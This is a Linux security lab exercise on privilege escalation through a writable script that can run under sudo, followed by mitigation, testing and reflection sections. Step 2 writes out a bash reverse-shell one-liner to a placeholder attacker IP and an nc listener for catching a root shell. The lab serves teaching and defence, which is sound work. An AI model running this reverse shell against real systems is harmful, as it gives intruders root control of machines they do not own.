Exercise 27: Exploiting Weaknesses in File Permissions with Sudo

Objective: Learn how weak file permissions in conjunction with sudo can be exploited to escalate privileges, and understand how to secure system files and configurations to prevent such attacks.

---

Scenario: Weak file permissions combined with sudo privileges can allow attackers to escalate their privileges on a Linux system. For example, if a script or binary executable with sudo privileges is writable by non-privileged users, it can be modified to include malicious commands. Your task is to identify such vulnerabilities, exploit them, and implement mitigation strategies.

---

Lab Setup

1. Environment:
   • A Linux system with sudo privileges configured.
   • A script or binary with writable permissions and sudo execution enabled.
2. Tools Required:
   • Terminal access to the target system.
   • sudo command.

---

Lab Steps

Step 1: Identify Vulnerable Files and Commands

1. List commands that the user can execute with sudo: sudo -l
   • Example output: (ALL) NOPASSWD: /usr/local/bin/vulnerable_script.sh
2. Check the permissions of the listed commands or files: ls -l /usr/local/bin/vulnerable_script.sh
   • Example output: -rw-rw-r-- 1 root root 1234 Jan 1 12:00 /usr/local/bin/vulnerable_script.sh
   • If the script is writable by the current user, it is vulnerable.

Step 2: Exploit the Vulnerability

1. Edit the vulnerable script to include a malicious command: echo 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' > /usr/local/bin/vulnerable_script.sh chmod +x /usr/local/bin/vulnerable_script.sh
   • Replace <your_ip> with your machine’s IP address.
2. Set up a listener on your attack machine: nc -lvnp 4444
3. Execute the vulnerable script with sudo: sudo /usr/local/bin/vulnerable_script.sh
4. Verify that the reverse shell connects and you have root privileges: whoami

Step 3: Analyze the Exploit

1. Document the steps that allowed the privilege escalation.
2. Understand how writable permissions combined with sudo privileges led to the vulnerability.

---

Solution

Explanation:

• Sudo privileges on writable files allow attackers to inject malicious commands or code into the file, which gets executed with elevated privileges.

Prevention:

1. Restrict File Permissions:
   • Ensure critical scripts or binaries are not writable by non-privileged users: chmod 755 /usr/local/bin/vulnerable_script.sh
   • Use chown to restrict ownership to root: chown root:root /usr/local/bin/vulnerable_script.sh
2. Audit Sudo Permissions:
   • Regularly review the sudoers configuration to ensure only trusted commands are allowed. sudo visudo
3. Use Secure Paths:
   • Avoid allowing sudo access to directories or commands in writable locations (e.g., /tmp).
4. Implement Logging and Monitoring:
   • Log all sudo activities to detect unusual behavior: sudo cat /var/log/secure
5. Limit Sudo Privileges:
   • Use least privilege principles to grant only the necessary permissions to users.

---

Testing and Verification

1. Attempt to modify the script or binary after applying strict permissions to confirm it is no longer writable.
2. Re-test sudo access to verify that the vulnerability has been mitigated.
3. Check logs to ensure all sudo activities are being monitored.

---

Reflection

This exercise demonstrates how weak file permissions combined with sudo privileges can lead to privilege escalation. By identifying and exploiting this vulnerability, you’ve gained insights into securing Linux systems against such attacks.